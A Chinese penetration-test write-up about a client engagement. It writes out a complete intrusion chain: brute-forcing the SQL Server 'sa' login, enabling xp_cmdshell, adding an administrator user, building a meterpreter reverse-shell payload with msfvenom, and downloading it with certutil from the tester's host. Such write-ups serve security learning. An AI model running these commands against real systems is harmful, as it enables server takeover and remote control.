服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

实战 | 记一次内网中反弹shell的艰难历程

日期: 来源:菜鸟学信安收集编辑:PaperPen

0x00 前言

最近在客户现场对内网服务器进行渗透测试,发现了大量的弱口令,本次历程就是从这里开始···

0x01 弱口令

对目标ip进行端口扫描,开放端口为80,445,1433,3389

  • 访问80端口,只是一个安装成功的界面,扫描一下目录看是否有源码泄露,无果
  • 使用nmap脚本对445端口进行扫描,看是否存在ms17010等漏洞,无果
  • 使用超级弱口令工具爆破1433,爆破成功,账号密码:sa/sa
  • 同时对3389端口进行爆破,无果
因此确定了突破口,使用navicat成功连接sql server数据库

0x02 连接3389

翻了一下,没什么数据,尝试拿服务器吧,因此直接新建查询,开启xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
然后执行命令
exec master..xp_cmdshell "whoami";
是system权限,和想象中的一样
3389是开着的,不如加个用户直接连接远程桌面吧

加强密码强度,重新添加
exec master..xp_cmdshell "net user test paperpen123. /add";
exec master..xp_cmdshell "net localgroup administrators test /add";
一切都很顺利,开始连接3389,但遗憾的是

是win7,只允许单用户登录,如果挤他的话被发现就不能继续玩耍了,还是放弃连接3389吧

0x03 powershell下载木马

我还是把shell弹到本地来吧,方便操作,但是说着简单,该怎么弹呢?
需要强调一点,这里的内网不可以访问外网,因此无法使用命令从外网下载工具
那么可以这样,让他从我的本地服务器下载工具到他的服务器上就可以了
但是要关闭本机防火墙,执行后访问失败才想起来。我的ip是195.1.7.23
使用kali生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe
本地phpstudy快速搭建环境
将shell.exe放到网站根目录下,链接为http://195.1.7.23/shell.exe
本地监听8888端口
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 195.1.7.23
LHOST => 195.1.7.23
msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > exploit
一切准备就绪,就差服务器执行shell.exe文件了。接下来的命令,大多是我朋友Calendula提供的,感谢一下
经测试,powershell是可以执行命令的,因此执行朋友Calendula给的下载命令
exec master..xp_cmdshell "powershell $client = new-object System.Net.WebClient";
exec master..xp_cmdshell "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')";
这两句本可以合并到一起执行,但是前面尝试执行其他命令时发现有长度限制

所以拆分进行执行,但是遗憾的是

DownloadFile无法使用,具体因为什么也没搞清楚,因此放弃了这种方法

0x04 证书下载

朋友Calendula又给我提供了一种思路,使用certutil.exe,顿时惊呆、闻所未闻,命令如下:
exec master..xp_cmdshell 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"';
使用dir查看,发现成功下载到了服务器上

0x05 反弹成功

就差一步了,输入下面的命令并紧张地点击了执行
exec master..xp_cmdshell 'shell.exe';
卡住了···,又执行了一遍,又卡住了···,又执行了一遍,什么情况···
回到监听界面,打算按下ctrl+c重新监听,结果进了meterpreter界面,原来是它卡住了···

激动地截了张图

查看了一下是不是域环境

没错是的,看来还有很长的路要走。。

0x06 结语

这次就写到这吧,如有进展,还会更新。欢迎各位师傅们留言讨论,互相交流,互相学习,共同进步。

作者:PaperPen,来源:先知社区

相关阅读

  • 年终奖打了“骨折”,我想离职了

  • 本文来自微信公众号:深燃(ID:shenrancaijing),作者:唐亚华 李秋涵 王敏 邹帅,编辑:王敏,头图来自:视觉中国现在,正是多家互联网大厂发放年终奖的日子。伴随着很多大公司的年终奖陆续沟
  • 这一波头条,给雷锋!

  • 今日,是学雷锋纪念日。60年来,雷锋的名字家喻户晓,雷锋的事迹深入人心,雷锋精神滋养着一代代中华儿女的心灵。重温雷锋事迹我们依然能从中汲取奋进力量传颂60年仍生生不息的雷锋
  • 我的任何成功,100.00% 来自于幸运

  • 昨天和老华在《客齐集小聚》的对谈环节聊到幸运在成功中占的比例。我认为,我自己的任何成功,100% 归功于幸运,归功于这个时代。除了时代因素,没有其他因素了。其中没有个人奋斗
  • 我被新冠“撞”了一下腰

  • 文/郭慧玲 (商丘)年前,我被新冠病毒感染后遗症打倒了。养病后期,我经常到河边缓慢散步。午后的河边,三五成群的老年人,悠闲地围坐着石桌打牌,身边还挤着一圈看牌的闲客,声音亢奋地替
  • 认知思维改变,人生就此改变

  • 认知思维改变,人生就此改变结束了深圳的学习之后,就来到了我弟子这边,给我的弟子赋能刚来到的时候,我的弟子盛情款待,已经提前为我开好了酒店套房.......哇哦!你有没有这样的弟子
  • 03-05丨好惨!全命中了!

  • —— 每年今日 ——【2016】坚持健走【2020】【心得】快乐致富【复盘】这本书的确很推荐,几乎每年我都重读。每次阅读后有新的心得,都会更新到我的读书心得笔记,下周起重新精

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 政府工作报告连续10年提及“快递”

  • 3月5日上午,第十四届全国人民代表大会第一次会议在人民大会堂开幕。政府工作报告提出,“完善农村快递物流配送体系”。这是自2014年以来,政府工作报告连续第10年将“快递”纳入
  • 实战 | 记一次内网中反弹shell的艰难历程

  • 0x00 前言最近在客户现场对内网服务器进行渗透测试,发现了大量的弱口令,本次历程就是从这里开始···0x01 弱口令对目标ip进行端口扫描,开放端口为80,445,1433,3389访问80端口
  • 记一次春日小出游

  • 大家好,我是沃克。近日渐渐感觉到春日气息,今天周六,阳光正好,遂出游。下午一点多从家出发,大概两点到达川大望江校区北门。​四川大学作为西南第一学府,刚来成都时候就想去逛下了
  • N!攻防演练快速打点综合工具

  • 声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试